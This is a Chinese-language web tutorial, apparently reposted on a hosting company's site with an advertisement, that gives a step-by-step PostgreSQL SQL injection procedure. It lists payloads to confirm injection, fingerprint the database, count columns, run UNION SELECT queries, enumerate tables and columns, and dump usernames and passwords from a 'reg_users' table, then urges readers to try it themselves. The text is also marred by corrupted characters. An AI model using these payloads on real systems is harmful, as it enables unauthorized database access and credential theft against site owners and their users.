本篇內(nèi)容主要講解“postgreasql數(shù)據(jù)庫(kù)注入的過(guò)程”,感興趣的朋友不妨來(lái)看看�����。本文介紹的方法操作簡(jiǎn)單快捷�����,實(shí)用性強(qiáng)。下面就讓小編來(lái)帶大家學(xué)習(xí)“postgreasql數(shù)據(jù)庫(kù)注入的過(guò)程”吧!
成都創(chuàng)新互聯(lián)公司-云計(jì)算及IDC服務(wù)提供商�����,涵蓋公有云�����、IDC機(jī)房租用�����、雅安電信機(jī)房��、等保安全���、私有云建設(shè)等企業(yè)級(jí)互聯(lián)網(wǎng)基礎(chǔ)服務(wù)���,溝通電話:13518219792
一��、判斷是否存在注入
and 1=2 返回錯(cuò)誤
and 1=1 返回正常�����,存在注入
and 1::int=1 返回正常說(shuō)明是postgresql數(shù)據(jù)庫(kù)
二�����、判斷字段數(shù)量
order by 5 返回錯(cuò)誤
order by 4 返回正常說(shuō)明����,有四列
三�����、聯(lián)合查詢
union select '1','2','3','4' 可以看出2/3號(hào)位置顯示
四���、獲取當(dāng)前數(shù)據(jù)庫(kù)
union select '1',current_database(),'3','4'
五����、獲取第一個(gè)表
union select '1',relname,'3','4' from pg_stat_user_tables limit 1 offset 0
獲取第二個(gè)表
union select '1',relname,relname,'4' from pg_stat_user_tables limit 1 offset 1
六���、獲取第一個(gè)字段
union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 0
獲取第二個(gè)字段
union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 1
七���、獲取字段內(nèi)容
union select '1',''||name||','||password||'','3','4' from reg_users
到此,相信大家對(duì)“postgreasql數(shù)據(jù)庫(kù)注入的過(guò)程”有了更深的了解���,不妨來(lái)實(shí)際操作一番吧����!這里是創(chuàng)新互聯(lián)網(wǎng)站�,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們�����,繼續(xù)學(xué)習(xí)�!
名稱欄目:postgreasql數(shù)據(jù)庫(kù)注入的過(guò)程
文章出自:
http://weahome.cn/article/pdgeoh.html
重慶分公司
重慶分公司
